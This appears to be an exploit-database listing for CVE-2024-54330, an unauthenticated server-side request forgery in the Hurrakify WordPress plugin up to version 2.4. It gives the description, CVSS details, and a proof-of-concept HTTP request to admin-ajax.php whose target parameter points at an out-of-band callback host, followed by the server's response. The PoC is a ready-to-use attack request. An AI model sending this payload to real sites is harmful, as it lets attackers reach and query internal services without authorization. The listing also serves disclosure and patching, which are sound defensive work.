## https://sploitus.com/exploit?id=1337DAY-ID-39851
# CVE-2024-54330
Hurrakify <= 2.4 - Unauthenticated Server-Side Request Forgery
# Description
The Hurrakify plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.4. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application which can be used to query and modify information from internal services.
## Details
- **Type**: plugin
- **Slug**: hurrakify
- **Affected Version**: 2.4
- **CVSS Score**: 7.2
- **CVSS Rating**: High
- **CVSS Vector**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
- **CVE**: CVE-2024-54330
- **Status**: Active
POC
---
```
GET /wp-admin/admin-ajax.php?action=hurraki_tooltip_proxy&target=http%3A%2F%2Fqrl9eu4dot1s941aio2eom17oyupif64.oast.site HTTP/2
Host: wp-dev.ddev.site
```
```
<html><body>bfdibc85r04ky96cie05dfzjjgigz</body></html>
```